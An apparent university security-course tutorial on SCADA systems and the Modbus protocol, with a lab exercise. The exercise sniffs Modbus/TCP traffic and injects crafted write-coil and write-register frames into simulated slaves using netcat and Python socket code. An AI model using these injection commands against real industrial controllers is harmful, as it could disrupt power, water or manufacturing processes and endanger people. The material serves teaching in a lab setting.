
SCADA Security

Matt B., Joe F.


April 22, 2015

Applied Security

Executive Summary
SCADA devices are used worldwide. Securing these devices is necessary for them to work properly.

This work is licensed under a Creative Commons Attribution 4.0 International License.

Contents

1 SCADA Security
2 What is SCADA?
3 History of SCADA Systems
4 SCADA Networks
5 SCADA Networks Security
6 MODBUS
7 RTAC
8 Problem Statement
9 News
10 Tutorial
  10.1 Our Setup
  10.2 TCP Injection
  10.3 Network Monitoring
  10.4 Craft TCP Data to Inject
  10.5 Inject Traffic
  10.6 Inject Traffic #2
11 Conclusion
12 Quiz
13 Answers
14 Revisions

1 SCADA Security
In this presentation we will discuss:
1. Introduction
2. Problem Statement
3. News
4. Tutorial
5. Conclusion

2 What is SCADA?
Supervisory Control And Data Acquisition (SCADA) system
- Programmable Logic Controller (PLC)
- Remote Terminal Unit (RTU) or Intelligent Electronic Device (IED)
- Human Machine Interface (HMI)
- Infrastructure

SCADA
- Provides control over remote systems.
- Subset of Industrial Control Systems (ICS)
- Just a fancy name for what is typically a custom, multi-protocol, complex-network structure, Real-Time Operating System (RTOS) controlled system used to control complex operations with critical or time-sensitive operations.

PLC
- Masters on some network; usually support one or possibly a few protocols
- Used to control other devices (protocol slaves)
- Usually report status up to some sort of monitoring device (HMI)

IED
- Protocol slaves, controlled / monitored by a master
- Generally responsible for doing the actual work in a system

Supervisory Computer
- Data aggregation
- Monitoring
- Logging

Infrastructure
- Network
- Power
- Mechanical

SCADA is used in many different types of systems. Some of the most common uses include:
- Power plants
- Manufacturing
- Food production
- Utility systems
- Wastewater treatment
- Telecom systems

Programmable Logic Controllers are the heart of the SCADA system. PLCs collect data from Remote Terminal Units and send new commands based on that data. The Supervisory Computer is used to create the logic that a PLC follows. Computers are also used for collecting statistical data on the SCADA network or on the system the SCADA network controls.

3 History of SCADA Systems
- Originally electro-mechanical / analog devices
- Digital electronics
  - More features
  - Inter-connectivity
- Master / slave structure
  - Point-to-point serial communications
  - Ethernet connectivity
- Remote settings & monitoring
- HMIs

Originally, ICS & SCADA systems were extremely complex mechanical, and later analog electronic, circuits. As electronics advanced, this began to change.
With advances in digital electronics, more highly featured systems were created with re-programmable settings, then software settings, then remote settings through serial, then finally settings accessible through Ethernet. Up through serial networking, the range of the networks was such that communications rarely left the building. But once Ethernet was added, everything began changing.
Once people started realizing they could potentially use modems, wireless, or wired network connections to check/repair systems remotely, all sorts of security problems arose. This mainly stems from the fact that power engineers are not typically well-versed in IT security, and the IT staff are typically not well-versed in ICS/SCADA system protocols & infrastructure.

4 SCADA Networks

[Figure: SCADA network diagram. Image source: https://www.selinc.com/WorkArea/DownloadAsset.aspx?id=6618]

Control room
  This is a managerial network whose purpose is to interconnect with the process-control networks. This is where the entire system can be monitored. These typically receive data from multiple process masters.

Legacy networks
  This normally means a slower serial protocol. This could be analog, digital, or serial (point-to-point RS232 connections or multi-drop RS485) connections. Typically there is at least one master device. Each master is typically controlling a single process with at least one slave device under its control. These slaves do the actual work, unaware of other slaves. The master is the only device that knows anything about the process as a whole.

Ethernet networks
  These are typically implemented using upgrades to the legacy network devices. The concepts are the same, but newer protocols and hardware layers are used. Fiber optics and wireless are possible in these networks.

5 SCADA Networks Security
- Where do you put the firewalls?
  - What latency would be added?
  - What are the requirements for the control system in use?
- Where is encryption needed?
  - Whole-packet encryption vs. data encryption
  - What about tunneling?
- How much can physical security be relied on?
  - Can anyone access the transmission media?
- Do the devices need passwords?
- Analog vs. serial vs. wired vs. fiber vs. wireless

6 MODBUS
- Developed by Modicon in 1979
- Open protocol
  - Open protocols are the protocol equivalent of open source
- Originally designed for serial ports
- Has a TCP adaptation (Modbus/TCP, normally on TCP port 502)
- Used by SCADA systems (like the one we will use today)

The MODBUS protocol we will be using today has a fixed format for its data transfer.

For serial (Modbus RTU):

+----+----+----------------+-------+
| ID |CODE|      DATA      |  CRC  |
+----+----+----------------+-------+

The unit ID is 1 byte (2 hex characters)
The function CODE is 1 byte (2 hex characters)
The DATA varies by function code; for a simple read request it is 4 bytes (8 hex characters)
The CRC is 2 bytes (4 hex characters), sent low byte first, and a slave drops any frame whose CRC does not match

For TCP (Modbus/TCP):

+--------+--------+--------+----+----+----------------+
|  T ID  |  P ID  | LENGTH | ID |CODE|      DATA      |
+--------+--------+--------+----+----+----------------+

The Transaction ID is 2 bytes (4 hex characters); the slave echoes it in its reply
The Protocol ID is 2 bytes and is always 0x0000 for Modbus
The LENGTH is 2 bytes and counts the bytes that follow it (unit ID, function code and data)
The ID, CODE and DATA are the same as for serial
There is no CRC: TCP supplies its own integrity check, so anyone who can open a TCP connection to the slave only needs a plausible header to have a frame accepted
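To make the two framings concrete, here is an added Python example (not code from the original slides, from Modicon or from SEL) that wraps the same Read Holding Registers PDU first as a serial RTU frame with its CRC-16 and then as a Modbus/TCP frame with the MBAP header. The request bytes 11 03 006B 0003 are the FC 3 example from simplymodbus.ca; the transaction ID is an arbitrary choice. It also shows the CRC check a serial slave performs and a TCP slave never does.

```python
import struct


def crc16_modbus(data: bytes) -> int:
    """CRC-16/MODBUS: reflected polynomial 0xA001, initial value 0xFFFF, no final XOR."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            if crc & 1:
                crc = (crc >> 1) ^ 0xA001
            else:
                crc >>= 1
    return crc


def rtu_frame(unit_id: int, pdu: bytes) -> bytes:
    """Serial (RTU) framing: unit ID + PDU (function code + data) + CRC, low byte first."""
    body = bytes([unit_id]) + pdu
    return body + struct.pack("<H", crc16_modbus(body))


def rtu_check(frame: bytes) -> bool:
    """The check a serial slave makes before acting on a frame: does the trailing CRC match?"""
    if len(frame) < 4:
        return False
    body, received = frame[:-2], struct.unpack("<H", frame[-2:])[0]
    return crc16_modbus(body) == received


def tcp_frame(transaction_id: int, unit_id: int, pdu: bytes) -> bytes:
    """Modbus/TCP framing: MBAP header (transaction ID, protocol 0, length) + unit ID + PDU.
    There is no CRC; the length field counts unit ID + function code + data."""
    length = 1 + len(pdu)
    return struct.pack(">HHH", transaction_id, 0, length) + bytes([unit_id]) + pdu


# Constructed input: Read Holding Registers (FC 3), start register 0x006B, 3 registers,
# addressed to unit 0x11 (the simplymodbus.ca FC 3 example request).
READ_REGS_PDU = bytes.fromhex("03 006B 0003")

if __name__ == "__main__":
    rtu = rtu_frame(0x11, READ_REGS_PDU)
    tcp = tcp_frame(0x0001, 0x11, READ_REGS_PDU)
    print("RTU frame :", rtu.hex())   # 1103006b00037687  (CRC 76 87, low byte first)
    print("TCP frame :", tcp.hex())   # 0001000000061103006b0003  (no CRC)
    print("CRC valid :", rtu_check(rtu))
    corrupted = bytes([rtu[0] ^ 0x01]) + rtu[1:]   # one flipped bit in the unit ID
    print("CRC valid after a flipped bit:", rtu_check(corrupted))
```

The serial frame is protected only against accidental corruption: anyone who can drive the bus can compute the CRC just as above. The TCP frame has even less, which is why the tutorial below can inject commands with nothing more than nc.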

7 RTAC
The RTAC (Real-Time Automation Controller) is an industrial computer designed by SEL (Schweitzer Engineering Laboratories).
It is used as a Programmable Logic Controller (in our experiment).

8 Problem Statement
- SCADA is everywhere
- SCADA security is not cut-and-paste security
- SCADA security is not built into the hardware
- It relies on secondary security methods

9 News
Hackers gain full control of critical SCADA systems (2014)
Stuxnet (2010)
Georgia Tackles Critical Infrastructure Attacks (2015)

10 Tutorial
Modbus TCP frame-crafting & injection
- Read / Write Coils (bits)
- Read / Write Registers (2 bytes)

Log into the Linux VM

Username:
Password:

10.1 Our Setup
SCADA devices
- Modbus Master (RTAC) from Schweitzer Engineering Labs (SEL)
- Modbus Slaves (ModbusPal.jar)
  - Simulated slaves. Think circuit breaker, motor controller, thermostat, etc.
Network
- Hub representing a local control network
  - Could represent several different points in the network.

What can be done at this point? If it were a typical control system, this network might be contained in a single room. It is probably not realistic that this traffic would be on a network hub and that we would have access to it. It is more likely that we would have access to an engineering PC connected to a single PLC or a few master devices.
But what if there were a distributed control system connecting several different individual control networks in different rooms or buildings? What if it were connected to a corporate network for ease of management? This scenario is a bit closer to what our network resembles.

10.2 TCP Injection
Netcat (source http://en.wikipedia.org/wiki/Netcat)
- Tool for reading / writing TCP & UDP data
- Run by typing nc into the Linux console

xxd
- Binary -> hex (ASCII) or hex (ASCII) -> binary
- Run by typing xxd into the console

nc [OPTIONS] [DESTINATION IP] [DESTINATION PORT]
  -p source port
  -s source ip

xxd [OPTIONS] [IN FILE]
  -h help
  -r hex to binary (reverse)
  -p plain / continuous hex (no offsets or ASCII column)

10.3 Network Monitoring
- Run Wireshark (as admin if necessary)
- Find Modbus traffic (display filter mbtcp; Modbus/TCP normally runs on TCP port 502)
- Decode the Modbus traffic to figure out who is talking to whom: which host is the master, which unit IDs answer, and which coils and registers are being polled
- Understand the conversations that are going on

10.4 Craft TCP Data to Inject
Create a Modbus frame:
- Sequence # / Transaction ID (2 bytes)
- Protocol # (2 bytes, always 0)
- Length of remaining portion in bytes (2 bytes)
- Slave address (1 byte)
- Function code (1 byte)
- Data (varies by function code / request / reply)

F1 example:

012300000006030100020001

0123 | 0000 | 0006 | 03 | 01 | 0002 | 0001
SEQU | PROT | BYTS |SLAV|FUNC| COIL | COUNT

source: http://www.simplymodbus.ca/

Common Modbus function codes & data sections
Function 1: Read Coils (bits)
  Request data: coil # (2 bytes), # of coils (2 bytes)
  Reply data: # of bytes of coil data (1 byte), data bytes (varies; 8 coils per byte, first coil in the least significant bit)
Function 3: Read Holding Registers (2 bytes each)
  Request data: register # (2 bytes), # of registers requested (2 bytes)
  Reply data: # of data bytes (1 byte), register data (2 bytes per register)
Function 5: Write Single Coil (1 bit)
  Request data: coil # (2 bytes), 0xFF00 for ON / 0x0000 for OFF (2 bytes)
  Reply data: coil # (2 bytes), written value (2 bytes)
Function 6: Write Single Holding Register (2 bytes)
  Request data: register # (2 bytes), write value (2 bytes)
  Reply data: register # (2 bytes), written value (2 bytes)

10.5 Inject Traffic
Try to flip a bit in one of the slaves (Function Code 5).
  Keep in mind that this bit could represent the on/off switch for power in a city.
Inject the crafted TCP data in a TCP connection:

echo '[HEX FRAME]' | xxd -r -p | nc [10.10.10.X] [PORT#]

xxd -r -p needs an even number of hex digits and ignores whitespace. The slave's reply comes back as raw bytes; pipe nc's output through xxd -p to read it, and compare it with the reply format in 10.4.

10.6 Inject Traffic #2
Try to change a value in one of the slaves (Function Code 6).
  Keep in mind that this could represent a setting for the process which might impact functionality or safety.
Inject the crafted TCP data in a TCP connection:

echo '[HEX FRAME]' | xxd -r -p | nc [10.10.10.X] [PORT#]
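The following added Python example (not code from the original tutorial, from ModbusPal or from SEL) walks through 10.4 to 10.6 offline: it builds FC 1/3/5/6 requests with the layout from 10.4, decodes the F1 example frame, and runs the requests against a minimal simulated slave standing in for ModbusPal (unit ID 3 as in the example; its coil and register contents are constructed) so both sides of the exchange are visible. inject() does over a socket what the echo | xxd | nc pipeline does; the host and port it takes are whatever Wireshark showed you, and the address in the comment is a placeholder.

```python
import socket
import struct


def mbap(tid: int, unit: int, pdu: bytes) -> bytes:
    """Modbus/TCP ADU: transaction ID, protocol 0, length of (unit ID + PDU), unit ID, PDU."""
    return struct.pack(">HHH", tid, 0, 1 + len(pdu)) + bytes([unit]) + pdu


def read_coils(tid, unit, start, count):        # FC 1
    return mbap(tid, unit, struct.pack(">BHH", 1, start, count))


def read_registers(tid, unit, start, count):    # FC 3
    return mbap(tid, unit, struct.pack(">BHH", 3, start, count))


def write_coil(tid, unit, addr, on):            # FC 5: 0xFF00 = ON, 0x0000 = OFF
    return mbap(tid, unit, struct.pack(">BHH", 5, addr, 0xFF00 if on else 0x0000))


def write_register(tid, unit, addr, value):     # FC 6
    return mbap(tid, unit, struct.pack(">BHH", 6, addr, value))


def decode(frame_hex: str) -> dict:
    """Split a hex frame into SEQU / PROT / BYTS / SLAV / FUNC; the data is left raw."""
    frame = bytes.fromhex(frame_hex)
    tid, proto, length, unit, fc = struct.unpack(">HHHBB", frame[:8])
    return {"tid": tid, "proto": proto, "length": length,
            "unit": unit, "fc": fc, "data": frame[8:6 + length].hex()}


class FakeSlave:
    """Simulated slave (ModbusPal stand-in) honouring FC 1, 3, 5 and 6. Constructed state:
    16 coils and 8 holding registers, all zero. Note what it never checks: who is asking."""

    def __init__(self, unit_id: int = 3):
        self.unit_id = unit_id
        self.coils = [False] * 16
        self.registers = [0] * 8

    def handle(self, frame: bytes) -> bytes:
        tid, proto, length, unit, fc = struct.unpack(">HHHBB", frame[:8])
        data = frame[8:6 + length]
        if proto != 0 or unit != self.unit_id:
            return b""                              # not addressed to us: stay silent
        if fc == 1:                                 # Read Coils -> byte count + packed bits
            start, count = struct.unpack(">HH", data)
            packed = bytearray((count + 7) // 8)
            for i, bit in enumerate(self.coils[start:start + count]):
                if bit:
                    packed[i // 8] |= 1 << (i % 8)  # first coil in the least significant bit
            pdu = bytes([fc, len(packed)]) + bytes(packed)
        elif fc == 3:                               # Read Holding Registers -> byte count + regs
            start, count = struct.unpack(">HH", data)
            regs = self.registers[start:start + count]
            pdu = bytes([fc, 2 * len(regs)]) + b"".join(struct.pack(">H", r) for r in regs)
        elif fc == 5:                               # Write Single Coil -> echo of the request
            addr, value = struct.unpack(">HH", data)
            self.coils[addr] = (value == 0xFF00)
            pdu = bytes([fc]) + data
        elif fc == 6:                               # Write Single Register -> echo of the request
            addr, value = struct.unpack(">HH", data)
            self.registers[addr] = value
            pdu = bytes([fc]) + data
        else:                                       # exception reply: FC | 0x80, code 01 (illegal function)
            pdu = bytes([fc | 0x80, 0x01])
        return mbap(tid, unit, pdu)


def injection_demo() -> dict:
    """10.4 to 10.6 end to end: read coil 2, flip it with FC 5, set register 1 with FC 6, read back."""
    slave = FakeSlave(unit_id=3)
    before = slave.handle(bytes.fromhex("012300000006030100020001"))   # the F1 example from 10.4
    slave.handle(write_coil(0x0124, 3, 2, True))
    after = slave.handle(read_coils(0x0125, 3, 2, 1))
    slave.handle(write_register(0x0126, 3, 1, 0x1234))
    regs = slave.handle(read_registers(0x0127, 3, 0, 2))
    return {"coil_before": before.hex(), "coil_after": after.hex(), "regs": regs.hex(),
            "coil2": slave.coils[2], "reg1": slave.registers[1]}


def inject(host: str, port: int, frame: bytes, timeout: float = 2.0) -> bytes:
    """What 'echo HEX | xxd -r -p | nc HOST PORT' does: connect, send, read one reply (ADU <= 260 bytes)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(frame)
        return s.recv(260)


if __name__ == "__main__":
    print(decode("012300000006030100020001"))
    for name, value in injection_demo().items():
        print(f"{name}: {value}")
    # Against the lab slave (placeholder address; take the port from Wireshark):
    # print(inject("10.10.10.X", 502, write_coil(0x0123, 3, 2, True)).hex())
```

The FC 5 and FC 6 replies echo the request, so a matching echo is the confirmation that the write took effect; a reply whose function code has the high bit set is an exception response. Nothing in the exchange identifies the sender, which is the whole point of the exercise.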


11 Conclusion
- SCADA is everywhere
- Many industrial sites rely on working networks
- SCADA security is not copy-paste
- Personnel around SCADA networks need security training
- A compromised SCADA network can be catastrophic

12 Quiz
1. Give an example of where a SCADA network would be found.
2. Why is SCADA security so difficult?
3. What is the protocol used by the SCADA network in this presentation?


13 Answers
1. Industrial sites, power plants, manufacturing plants
2. Security is not built into SCADA systems; it has to be added.
3. MODBUS

14 Revisions

Revision # | Comments
1.0        | Matt B.
